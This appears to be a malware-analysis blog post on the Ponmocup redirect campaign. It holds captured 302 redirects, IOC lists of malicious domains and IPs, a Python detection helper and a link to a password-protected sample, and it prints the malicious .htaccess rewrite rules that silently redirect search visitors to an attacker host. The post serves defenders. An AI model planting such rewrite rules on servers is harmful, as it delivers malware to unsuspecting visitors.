<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">GET / HTTP/1.1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Host: www.zur-sonne.de</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept-Language: en-us,en;q=0.5</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept-Encoding: gzip,deflate</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Keep-Alive: 115</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Connection: keep-alive</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Referer: http://www.google.ch/search?q=search</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">HTTP/1.1 302 Found</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Content-Type: text/html; 
charset=iso-8859-1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Date: Wed, 30 May 2012 19:58:03 GMT</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Server: Apache</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="background-color: yellow; font-family: "Courier New",Courier,monospace;">Set-Cookie: wXu=88; path=/; domain=www.zur-sonne.de; expires=Thu, 07-Jun-2012 06:43:03 GMT</span><br style="background-color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="background-color: yellow; font-family: "Courier New",Courier,monospace;">Location: http://derhana.ottawaapplianceservice.com/url?sa=D&source=web&cd=40&ved=0Y0njnzC0&url=http://www.zur-sonne.de/&ei=2ZIhfanJ4a20qo2MzFI19pu1pw==&usg=VtQuEf-ZH8RtWK5VeBWaYx&sig2=TcdEGbs2CczezFymxobGQs</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Content-Length: 409</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Keep-Alive: timeout=2, max=200</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Connection: Keep-Alive</span></span><br />
<br />
<a href="http://www.urlvoid.com/scan/brautwelt.com/">http://www.urlvoid.com/scan/brautwelt.com/</a><br />
<span style="color: red;">Detections 0/32 (0.00%)</span><br />
<span style="color: red;">Status CLEAN</span> <b>-- is wrong!</b><br />
<br />
<a href="http://urlquery.net/report.php?id=61035">http://urlquery.net/report.php?id=61035</a><br />
<a href="http://urlquery.net/domainmap.php?id=61035">http://urlquery.net/domainmap.php?id=61035</a><br />
<br />
<a href="http://wepawet.cs.ucsb.edu/view.php?hash=7bd389d100b214c2c3d828a625a4d960&t=1338367510&type=js">http://wepawet.cs.ucsb.edu/view.php?hash=7bd389d100b214c2c3d828a625a4d960&t=1338367510&type=js</a><br />
<br />
So much for now, will update later :)<br />
<br />
<br />
<span style="font-style: italic; font-weight: bold;"><span style="color: red;">Updated 2012-05-31: new IP in new AS from Ukraine</span></span><br />
<br />
Since yesterday there seems to be a new domain and IP used for redirection.<br />
<br />
<div style="color: red; font-family: "Courier New",Courier,monospace;">
*.suncoastintegration.com / 91.207.4.51</div>
<br />
<a href="http://urlquery.net/report.php?id=61824">http://urlquery.net/report.php?id=61824</a><br />
<a href="http://urlquery.net/domainmap.php?id=61824">http://urlquery.net/domainmap.php?id=61824</a><br />
<br />
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">GET / HTTP/1.1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Host: www.haar-kosmetik-elke.at</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept-Language: en-us,en;q=0.5</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept-Encoding: gzip,deflate</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Keep-Alive: 115</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Connection: keep-alive</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Referer: http://www.google.ch/search?q=haare elke</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">HTTP/1.1 302 Found</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Content-Type: 
text/html; charset=iso-8859-1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Date: Thu, 31 May 2012 15:22:26 GMT</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Server: Apache</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Set-Cookie: ycg=7; path=/; domain=www.haar-kosmetik-elke.at; expires=Thu, 07-Jun-2012 22:09:26 GMT</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="background-color: yellow; font-family: "Courier New",Courier,monospace;">Location: http://64818.suncoastintegration.com/url?sa=D&source=web&cd=35&ved=0Uwyx0bHq&url=http://www.haar-kosmetik-elke.at/&ei=2ZIve67N5qe9r42LzFUw9Ju1pA==&usg=qxAULtLuZCKhxlKx8jozeI&sig2=Xbx4cH8V3ygWhtyx7magT7</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Content-Length: 488</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">Connection: close</span></span><br />
<br />
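As an added example (not code from the original post), here is a small analyzer that takes captured exchanges like the two above (zur-sonne.de and haar-kosmetik-elke.at) and extracts the redirect indicators: the old "/cgi-bin/r.cgi" versus the new "/url" pattern, the redirect domain, whether the "*" label is a source-port number or a random alpha string, the landing URL and the cookie name. It also builds the probe request (Google referer plus browser user-agent) that reputation checkers like urlvoid never send. The two responses are copied from the post's captures; the classification rules, the two-label registered-domain heuristic and the parameter list of the fake "/url" redirect are the example's own assumptions:<br />

```python
"""Added example (not from the original post): extract Ponmocup redirect
indicators from captured HTTP responses such as the two above.  The two
responses are copied from the post's captures (only the relevant headers);
the classification rules and the two-label domain heuristic are assumptions
made for this example."""
import re
from urllib.parse import parse_qs, urlsplit

# Captured from www.zur-sonne.de, 2012-05-30 (from the post)
RESP_ZUR_SONNE = (
    "HTTP/1.1 302 Found\r\n"
    "Set-Cookie: wXu=88; path=/; domain=www.zur-sonne.de; expires=Thu, 07-Jun-2012 06:43:03 GMT\r\n"
    "Location: http://derhana.ottawaapplianceservice.com/url?sa=D&source=web&cd=40&ved=0Y0njnzC0"
    "&url=http://www.zur-sonne.de/&ei=2ZIhfanJ4a20qo2MzFI19pu1pw==&usg=VtQuEf-ZH8RtWK5VeBWaYx"
    "&sig2=TcdEGbs2CczezFymxobGQs\r\n"
    "Content-Length: 409\r\n\r\n"
)
# Captured from www.haar-kosmetik-elke.at, 2012-05-31 (from the post)
RESP_HAAR = (
    "HTTP/1.1 302 Found\r\n"
    "Set-Cookie: ycg=7; path=/; domain=www.haar-kosmetik-elke.at; expires=Thu, 07-Jun-2012 22:09:26 GMT\r\n"
    "Location: http://64818.suncoastintegration.com/url?sa=D&source=web&cd=35&ved=0Uwyx0bHq"
    "&url=http://www.haar-kosmetik-elke.at/&ei=2ZIve67N5qe9r42LzFUw9Ju1pA==&usg=qxAULtLuZCKhxlKx8jozeI"
    "&sig2=Xbx4cH8V3ygWhtyx7magT7\r\n"
    "Content-Length: 488\r\n\r\n"
)

PORT_LABEL = re.compile(r"^\d{4,5}$")          # the "*" label: source-port number
ALPHA_LABEL = re.compile(r"^[a-z]+$")          # the newer "(random-alpha)*" label
GOOGLE_HOST = re.compile(r"(^|\.)google\.[a-z.]+$")
# query parameters the fake Google-style redirect carries in the captures above
PONMOCUP_URL_PARAMS = {"sa", "source", "cd", "ved", "url", "ei", "usg", "sig2"}


def parse_response(raw):
    """Split a raw HTTP response into (status line, {lower-case name: value})."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    status, *lines = head.split("\n")
    headers = {}
    for line in lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def registered_domain(host):
    # Assumption: two-label registrable domain (fine for the IOC list in this
    # post, wrong for ccSLDs such as .co.uk).
    return ".".join(host.split(".")[-2:])


def classify_redirect(location):
    """Classify a Location target: old /cgi-bin/r.cgi pattern, new fake-Google
    /url pattern, a real Google /url redirect, or anything else."""
    u = urlsplit(location)
    host = (u.hostname or "").lower()
    q = parse_qs(u.query)
    r = {"host": host, "redirect_domain": registered_domain(host) if host else "",
         "pattern": "other", "subdomain_kind": None, "landing_url": None}
    if u.path == "/cgi-bin/r.cgi":
        r["pattern"] = "ponmocup-r.cgi"
    elif u.path == "/url" and "url" in q:
        r["landing_url"] = q["url"][0]           # the site the visitor came from
        if GOOGLE_HOST.search(host):
            r["pattern"] = "google-url"          # legitimate search-result redirect
        elif PONMOCUP_URL_PARAMS <= set(q):
            r["pattern"] = "ponmocup-url"
    if r["pattern"].startswith("ponmocup"):
        labels = host.split(".")
        sub = labels[0] if len(labels) > 2 else ""
        r["subdomain_kind"] = ("port-number" if PORT_LABEL.match(sub)
                               else "random-alpha" if ALPHA_LABEL.match(sub) else "none")
    return r


def analyze(raw):
    """Run the whole check on one captured response."""
    status, h = parse_response(raw)
    r = {"status": status, "cookie": None, "pattern": "other"}
    if "set-cookie" in h:
        r["cookie"] = h["set-cookie"].split("=", 1)[0]   # e.g. wXu, ycg
    parts = status.split()
    if len(parts) > 1 and parts[1] == "302" and "location" in h:
        r.update(classify_redirect(h["location"]))
    r["ponmocup"] = r["pattern"].startswith("ponmocup")
    return r


def build_probe_request(host, query="search"):
    """Raw GET reproducing what the hacked .htaccess checks: a search-engine
    referer plus a browser user-agent (values as in the post's captures)."""
    return ("GET / HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) "
            "Gecko/20101203 Firefox/3.6.13\r\n"
            f"Referer: http://www.google.ch/search?q={query}\r\n"
            "Connection: close\r\n\r\n")


if __name__ == "__main__":
    for raw in (RESP_ZUR_SONNE, RESP_HAAR):
        print(analyze(raw))
    print(build_probe_request("www.zur-sonne.de"))
```

Send the probe request without the Referer header once and with it once; a clean site answers the same both times, an infected one answers the referer-carrying request with the 302 and cookie shown above.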
<br /><p><b>Ponmocup, lots changed, but not all</b> <i>(TomU, published 2012-03-08, last updated 2012-04-14)</i></p><span style="font-style: italic; font-weight: bold;">Updated on 2012-03-09 </span><span style="font-style: italic;">(see at the end <span style="color: rgb(255, 0, 0);">and the list of domains below</span>)</span><br /><br /><strong><em>Updated on 2012-03-15</em> </strong><em><span style="color:#000099;">(list of domains below)</span></em><br /><br /><strong><em>Updated on 2012-04-14</em> </strong><em><span style="color:#000099;">(more info, links to IOCs and references at the end)</span></em><br /><br />So here goes another post about the Ponmocup malware. Lots of things changed recently, but not all (luckily for defenders).<br /><br />First, for those not yet familiar with the infection steps, a quick overview. A user searches for something with a web search engine, e.g. Google, and clicks on a result that leads to a compromised website. The compromise is not an (obfuscated) script injected into particular pages; instead the site's ".htaccess" file was modified. It checks the referer and the user-agent of each visitor and, if both match (a search-engine referer and a browser user-agent), answers with a 302 redirect and sets a cookie. The intermediate redirection server answers with another 302 redirect to a third server, which delivers the malware executable: an EXE or COM file named after the search query terms.<br /><br />Previously, the first redirection step used a "/cgi-bin/r.cgi" pattern, which was detected by this snort rule (<a href="http://doc.emergingthreats.net/bin/view/Main/2013312">2013181</a>). 
Here's an <a href="http://www9.dyndns-server.com:8080/pub/botnet/r-cgi_malware_analyse_2011-08-03.txt">example from 2011-08-03</a>.<br /><br />Just recently I discovered that this pattern changed <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains_2012-03-08.htm">at least since 2012-01-24</a>. The first redirection now looks very much like that from a Google search result (/url?sa=...). Here's an example of the <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/analysis_2012-03-07.txt">new infection pattern from 2012-03-07</a>. (<a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/google_query_words.zip">Sample</a> with pwd "infected")<br /><br />I submitted the sample to VT and some online analysis services. Here's a <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/analysis_7096_ae89045e3448df19de679988e6e6600d.pdf">GFI Sandbox report</a> [PDF]. As you can <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/2012-03-07_152144_ponmocup-GFI.png">see in this report</a>, lots of indicators are still the same (although some are randomized). The registry key mentioned in my previous post is still set. That's still one constant (and easy) indicator to detect an infection. 
The hosts file doesn't seem to be changed anymore.<br /><br />The C2 traffic after an infection changed a lot, too, so most <a href="http://doc.emergingthreats.net/bin/view/Main/WebSearch?search=Ponmocup">old snort rules</a> won't detect it anymore.<br />Here's some "OSINT research" I've done in late November last year.<br /><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-domains-IPs-MD5-date.txt">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-domains-IPs-MD5-date.txt</a><br /><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-traffic-domains-more-details-full.txt">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-traffic-domains-more-details-full.txt</a><br /><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-traffic-more-details-full.txt">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-traffic-more-details-full.txt</a><br /><br />For more details about previous research please see the <a href="http://www9.dyndns-server.com:8080/pub/botnet-links.html">main page</a>, and excuse the bad formatting! 
(I just wanted to put that info <span style="font-style: italic;">somewhere fast & quick</span>)<br /><br />Now if you were just looking for some new network indicators, here's a list of <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains_2012-03-08.htm">observed</a> malware redirect domains and IPs:<br /><br /><span style="font-family:courier new;">176.53.112.107</span><br /><span style="font-family:courier new;">176.53.112.108</span><br /><span style="font-family:courier new;">178.211.33.202</span><br /><span style="font-family:courier new;">178.211.33.203</span><br /><span style="font-family:courier new;">77.79.11.96</span><br /><br /><span style="font-family:courier new;">*.3d-tablet.cc</span><br /><span style="font-family:courier new;">*.aabathlift.com</span><br /><span style="font-family:courier new;">*.akitahusky.com</span><br /><span style="font-family:courier new;">*.akitahusky.net</span><br /><span style="font-family:courier new;">*.akitahusky.org</span><br /><span style="font-family:courier new;">*.albinopleco.com</span><br /><span style="font-family:courier new;">*.bapiescafe.com</span><br /><span style="font-family:courier new;">*.customshowerdoorsc.com</span><br /><span style="font-family:courier new;">*.dancearkansas.com</span><br /><span style="font-family:courier new;">*.ilyanet.info</span><br /><span style="font-family:courier new;">*.peachtreepropainters.biz</span><br /><span style="font-family:courier new;">*.peachtreepropainters.com</span><br /><span style="font-family:courier new;">*.peachtreepropainters.info</span><br /><span style="font-family:courier new;">*.peachtreepropainters.net</span><br /><span style="font-family:courier new;">*.puritanhardrive.com</span><br /><span style="font-family:courier new;">*.soroki.info</span><br /><span style="font-family:courier new;">*.thepetserver.com</span><br /><span style="font-family:courier new;">*.vicandbarbs.net</span><br /><br /><span style="color: rgb(255, 0, 
0);">Thanks Kenneth (<a href="https://twitter.com/Patories">@Patories</a> / <a href="http://randomthoughtsofforensics.blogspot.com/">blog</a>) for adding to this list! (added 2012-03-09)</span><br /><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.3d-tablet.biz</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.3d-tablet.me</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.3d-tablet.tv</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.appliancerecyclingportland.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.crisisice.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.entrygrid.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.iphone-yes.us</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.jennyswanepoel.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.kingoftheaquarium.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.learn2drive4free.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.nosilentnight.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.ns.themahoganylife.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.p-ballgames.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.pballgames.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.perfectgameproductions.biz</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.reefclown.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.suncoastintegration.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.thesubtleactivist.com</span><br /><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.thomasyohannan.com</span><br 
/><span style="color: rgb(255, 0, 0);font-family:courier new;" >*.travel-yes.com</span><br /><br /><span style="font-family:courier new;">argumenthistorical.org</span><br /><span style="font-family:courier new;">besidesdream.com</span><br /><span style="font-family:courier new;">capitalinformer.com</span><br /><span style="font-family:courier new;">dmjxluffloundering.info</span><br /><span style="font-family:courier new;">dutytraditional.net</span><br /><span style="font-family:courier new;">dvmsoft.eu</span><br /><span style="font-family:courier new;">earlyanswered.com</span><br /><span style="font-family:courier new;">formedtouch.com</span><br /><span style="font-family:courier new;">gtracking.org</span><br /><span style="font-family:courier new;">interestingchapter.net</span><br /><span style="font-family:courier new;">jesusonlynet.org</span><br /><span style="font-family:courier new;">khyiftcrusher.info</span><br /><span style="font-family:courier new;">nbeegclassics.info</span><br /><span style="font-family:courier new;">oorvyvwdeciphers.info</span><br /><span style="font-family:courier new;">reportedtechniques.org</span><br /><span style="font-family:courier new;">sahnespender.com</span><br /><span style="font-family:courier new;">sqpgksbweathering.info</span><br /><span style="font-family:courier new;">szentkoronaradio.com</span><br /><span style="font-family:courier new;">teethalong.org</span><br /><span style="font-family:courier new;">travelmeant.net</span><br /><span style="font-family:courier new;">twiceseparate.com</span><br /><span style="font-family:courier new;">underbuild.net</span><br /><span style="font-family:courier new;">virtualmapping.org</span><br /><span style="font-family:courier new;">watchingsquare.com</span><br /><br /><span style="font-family:courier new;">*.bankingonbankers.com</span><br /><span style="font-family:courier new;">109.236.80.151</span><br /><p><span style="color:#000099;">added 2012-03-15:</span></p><p><span 
style="font-family:Courier New;color:#000099;">*.stephanized.info / 176.53.112.107</span></p><p><span style="font-family:Courier New;color:#000099;">*.b12capitalpartners.com / 109.236.80.187</span></p><br /><br />The previous lists of domains have not been updated with the new ones (yet).<br /><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains-History_2012-02-20.txt">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains-History_2012-02-20.txt</a><br /><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains-IPs_2012-02-20.html">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains-IPs_2012-02-20.html</a><br /><br />Now who will create some snort rules or IOCs out of this?<br /><br />Let's go ;-)<br /><br /><br /><span style="font-style: italic; font-weight: bold;">Updated on 2012-03-09:</span><span style="font-style: italic;"><br /></span><br />First let me clear something up. The infection does not exploit any software vulnerability; the only thing exploited is the "human", via social engineering. A user searching for some <span style="font-style: italic;">query terms</span> is lured into opening the downloaded malware executable because those <span style="font-style: italic;">query terms</span> appear in the file name. So fully patched Windows systems are just as exposed, as long as users can download and run executables from the Internet.<br /><br />The user does not need admin privileges on the system to get infected. For non-admins "only" the account that ran the malware executable gets infected.<br /><br />Now let's take another look at the first step of the infection: the redirect coming from the manipulated ".htaccess" file on a hacked web server. I believe the .htaccess files are modified using stolen (FTP or other) logins to these web servers.<br /><br />I got hold of such a <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/htaccess.txt">.htaccess file</a> and located the malicious "code". 
The 33 lines of code are <span style="font-style: italic;">well hidden</span> in the middle of the more than 3,000-line file, which makes them <span style="font-style: italic;">really hard to find</span> ;-) (end of sarcasm)<br /><br /><span style="font-family:courier new;">$ wc -l htaccess.txt</span><br /><span style="font-family:courier new;">3094 htaccess.txt</span><br /><br /><span style="font-family:courier new;">$ egrep -n " " htaccess.txt | wc -l</span><br /><span style="font-family:courier new;">33</span><br /><br /><span style="font-family:courier new;">$ egrep -n " " htaccess.txt</span><br /><span style="font-size:85%;"><span style="font-family:courier new;">1513:&lt;IfModule mod_rewrite.c&gt;</span><br style="font-family:courier new;"><span style="font-family:courier new;">1515:RewriteEngine On</span><br style="font-family:courier new;"><span style="font-family:courier new;">1517:RewriteCond %{REQUEST_METHOD} ^GET$</span><br style="font-family:courier new;"><span style="font-family:courier new;">1519:RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(wordpresstwittweetflickr\.linkedingoogle\.yahoo\.bing\.msn\.ask\.excite\.a</span><br style="font-family:courier new;"><span style="font-family:courier new;">ltavista\.netscape\.aol\.hotbot\.goto\.infoseek\.mamma\.alltheweb\.lycos\.metacrawler\.mail\.dogpile\?).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1521:RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1523:RewriteCond %{HTTP_USER_AGENT} !^.*(bingAccoonaAce\sExplorerAmfibiAmiga\sOSapacheappieAppleSyndication).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1525:RewriteCond %{HTTP_USER_AGENT} !^.*(ArchiveArgusAsk\sJeevesasteriasAtrenko\sNewsBeOSBigBlogZoo).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1527:RewriteCond %{HTTP_USER_AGENT} 
!^.*(Biz360BlaizBloglinesBlogPulseBlogSearchBlogsLiveBlogsSayblogWatcher).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1529:RewriteCond %{HTTP_USER_AGENT} !^.*(BookmarkbotCE\-PreloadCFNetworkcococCombineCrawlcurlDanger\shiptop).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1531:RewriteCond %{HTTP_USER_AGENT} !^.*(DiagnosticsDTAAgentEmeraldShieldendoEvaalEverest\-Vulcan).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1533:RewriteCond %{HTTP_USER_AGENT} !^.*(exactseekFeedFetchfindlinksFreeBSDFriendsterFuck\sYouGoogle).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1535:RewriteCond %{HTTP_USER_AGENT} !^.*(GregariusHatenaScreenshotheritrixHolyCowDudeHonda\-SearchHP\-UX).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1537:RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPGHttpClienthttpunitichiroiGetteriPhoneIRIXJakartaJetBrains).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1539:RewriteCond %{HTTP_USER_AGENT} !^.*(KrugleLabradorlarbinLeechGetlibwwwLifereaLinkChecker).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1541:RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurfLinuxLiveJournalLonoponoLotus\-NotesLycosLynxMac\_PowerPC).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1543:RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPCMac\s10Mac\sOSmacDNMacintoshMediapartnersMegiteMetaProducts).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1545:RewriteCond %{HTTP_USER_AGENT} !^.*(MivaMobileNetBSDNetNewsWireNetResearchServerNewsAlloyNewsFire).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1547:RewriteCond %{HTTP_USER_AGENT} 
!^.*(NewsGatorOnlineNewsMacProNokiaNuSearchNutchObjectSearchOctora).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1549:RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorerOmnipelagosOnetOpenBSDOpenIntelligenceDataoreilly).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1551:RewriteCond %{HTTP_USER_AGENT} !^.*(os\=MacP900ipanscientperlPlayStationPOE\-ComponentPrivacyFinder).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1553:RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclonePythonretrieverRojoRSSSBIderScooterSeekerSeries\s60).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1555:RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReaderSiteBarSlurpSnoopySoap\sClientSocialmarksSphere\sScout).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1557:RewriteCond %{HTTP_USER_AGENT} !^.*(spidersprooseRamblerStrawsubscriberSunOSSurferSyndic8).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1559:RewriteCond %{HTTP_USER_AGENT} !^.*(SyntryxTargetYourNewsTechnoratiThunderbirdTwicelerurllibValidator).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1561:RewriteCond %{HTTP_USER_AGENT} !^.*(ViennavoyagerW3CWavefirewebcollageWebmasterWebPatrolwgetWin\s9x).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1563:RewriteCond %{HTTP_USER_AGENT} !^.*(Win16Win95Win98Windows\s95Windows\s98Windows\sCEWindows\sNT\s4).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1565:RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTPWinNT4WordPressWWWeaselwwwsteryacyYahoo).*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1567:RewriteCond %{HTTP_USER_AGENT} !^.*(YandexYetiYouReadMeZhuaxiaZyBorg).*$ [NC]</span><br 
style="font-family:courier new;"><span style="font-family:courier new;">1569:RewriteCond %{REQUEST_FILENAME} !.*jpg$.*gif$.*png.*jpeg.*mpg.*avi.*zip.*gz.*tar.*ico$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1571:RewriteCond %{HTTP_COOKIE} !^.*ejJ.*$ [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1573:RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]</span><br style="font-family:courier new;"><span style="font-family:courier new;">1575:RewriteCond %{HTTPS} ^off$</span><br style="font-family:courier new;"><span style="font-family:courier new;">1577:RewriteRule ^(.*)$ http://%{REMOTE_PORT}.<span style="color: rgb(255, 0, 0);">puritanhardrive.com</span>/url?sa=X&source=web&cd=39&ved=0FLFQWdF5&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZItfKzI4Ki3pI2JzVAz9Je1pw==&usg=pyT9z9Cp7DU5572d38ywx9&sig2=bDduChtXGT22SxV5UI2D8H [R=302,L,CO=ejJ:43:%{HTTP_HOST}:10549:/:0:HttpOnly]</span></span><br /><br />As you can see (and as mostly mentioned before), referrer, user-agent and cookie are checked, and only if all conditions match is the redirect to the malware server sent back: the request has to be a plain-HTTP GET, the referrer has to come from one of the listed search engines or social networks (but not from an image search), the user-agent must not be on the long exclusion list of crawlers, feed readers, download tools, old Windows versions and non-Windows platforms, the request must not be for an image or archive file, no <span style="font-family:courier new;">ejJ</span> cookie may be present, and the user-agent must contain "Windows". (The <span style="font-family:courier new;">|</span> alternation operators inside the parentheses have been lost in the listing above; each parenthesized group is a <span style="font-family:courier new;">|</span>-separated list of substrings.)<br /><br />The <span style="font-family:courier new;">CO=</span> flag on the final RewriteRule sets the <span style="font-family:courier new;">ejJ</span> cookie together with the 302 (value 43, scoped to the compromised host, lifetime 10549 minutes or roughly a 